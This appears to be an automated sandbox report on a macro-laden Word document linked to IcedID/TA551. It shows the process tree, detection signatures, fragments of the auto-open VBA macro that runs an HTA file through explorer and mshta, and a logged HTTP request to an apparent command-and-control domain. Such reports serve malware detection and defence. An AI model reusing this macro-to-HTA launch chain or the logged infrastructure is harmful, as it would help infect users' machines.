Loading ...

Play interactive tourEdit tour

Windows Analysis Report charge_12.01.2021.doc

Overview

General Information

Sample Name:charge_12.01.2021.doc
Analysis ID:532355
MD5:18499830201cddade8183b8e24fdf30a
SHA1:55c498cf7273cab567f49a00c15ca3316c001215
SHA256:0a42f6762ae4f3b1d95aae0f8977cde6361f1d59b5ccc400c41772db0205f7c5
Tags:BokbotdocIcedIDmacrosShathakTA551Word
Infos:

Most interesting Screenshot:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious MSHTA Process Patterns
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Document has an unknown application name
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Creates a window with clipboard capturing capabilities
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Document contains an embedded VBA macro which reads document properties (may be used for disguise)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Searches for user specific document files
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2064 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • explorer.exe (PID: 1960 cmdline: explorer youTube.hta MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 1580 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • mshta.exe (PID: 1188 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious MSHTA Process PatternsShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1580, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" , ProcessId: 1188

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: charge_12.01.2021.docVirustotal: Detection: 20%Perma Link
Machine Learning detection for sampleShow sources
Source: charge_12.01.2021.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.62.42.207:80
Source: global trafficDNS query: name: winrentals2017b.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.62.42.207:80
Source: global trafficHTTP traffic detected: GET /tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: winrentals2017b.comConnection: Keep-Alive
Source: mshta.exe, 00000004.00000002.418202700.0000000006340000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: WINWORD.EXE, 00000000.00000002.531696202.00000000090C0000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000004.00000002.418202700.0000000006340000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: WINWORD.EXE, 00000000.00000002.531696202.00000000090C0000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
Source: WINWORD.EXE, 00000000.00000002.531696202.00000000090C0000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
Source: WINWORD.EXE, 00000000.00000002.531954331.00000000092A7000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.417049273.0000000003377000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: WINWORD.EXE, 00000000.00000002.531954331.00000000092A7000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.417049273.0000000003377000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: WINWORD.EXE, 00000000.00000002.528805255.0000000004490000.00000002.00020000.sdmp, explorer.exe, 00000002.00000002.405382642.0000000001E70000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.405616218.0000000001D60000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WINWORD.EXE, 00000000.00000002.531954331.00000000092A7000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.417049273.0000000003377000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: WINWORD.EXE, 00000000.00000002.531954331.00000000092A7000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.417049273.0000000003377000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000004.00000002.418224211.000000000635A000.00000004.00000001.sdmpString found in binary or memory: http://winrentals2017b.com/tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBa
Source: WINWORD.EXE, 00000000.00000002.528805255.0000000004490000.00000002.00020000.sdmp, explorer.exe, 00000002.00000002.405382642.0000000001E70000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.405616218.0000000001D60000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: WINWORD.EXE, 00000000.00000002.531696202.00000000090C0000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: WINWORD.EXE, 00000000.00000002.531954331.00000000092A7000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.417049273.0000000003377000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: WINWORD.EXE, 00000000.00000002.531696202.00000000090C0000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F929E0A5-0B20-4288-9DA9-D559EA91D780}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: winrentals2017b.com
Source: global trafficHTTP traffic detected: GET /tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: winrentals2017b.comConnection: Keep-Alive
Source: C:\Windows\SysWOW64\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function s, API IWshShell3.exec("explorer youTube.hta")Name: s
Source: charge_12.01.2021.docOLE indicator has summary info: false
Source: ~WRF{477B7D15-E68B-42EE-9265-E39BF1B772F7}.tmp.0.drOLE indicator has summary info: false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: charge_12.01.2021.docOLE indicator application name: unknown
Source: ~WRF{477B7D15-E68B-42EE-9265-E39BF1B772F7}.tmp.0.drOLE indicator application name: unknown
Source: charge_12.01.2021.docOLE, VBA macro line: Public Sub autoopen()
Source: VBA code instrumentationOLE, VBA macro: Module main, Function autoopenName: autoopen
Source: charge_12.01.2021.docOLE indicator, VBA macros: true
Source: charge_12.01.2021.docOLE, VBA macro line: keywords = activedocument.builtindocumentproperties("keywords").value
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
Source: ~WRF{477B7D15-E68B-42EE-9265-E39BF1B772F7}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: charge_12.01.2021.docVirustotal: Detection: 20%
Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe explorer youTube.hta
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe explorer youTube.htaJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" Jump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
Source: WINWORD.EXE, 00000000.00000002.531696202.00000000090C0000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$arge_12.01.2021.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC966.tmpJump to behavior
Source: classification engineClassification label: mal64.expl.winDOC@6/14@1/1
Source: charge_12.01.2021.docOLE document summary: title field not present or empty
Source: charge_12.01.2021.docOLE document summary: edited time not present or 0
Source: ~WRF{477B7D15-E68B-42EE-9265-E39BF1B772F7}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{477B7D15-E68B-42EE-9265-E39BF1B772F7}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{477B7D15-E68B-42EE-9265-E39BF1B772F7}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: charge_12.01.2021.docInitial sample: OLE summary keywords = ath.ebuTuoy
Source: ~WRF{477B7D15-E68B-42EE-9265-E39BF1B772F7}.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exe TID: 2248Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2248Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2700Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 2692Thread sleep time: -240000s >= -30000sJump to behavior
Source: explorer.exe, 00000003.00000003.404886845.000000000017F000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
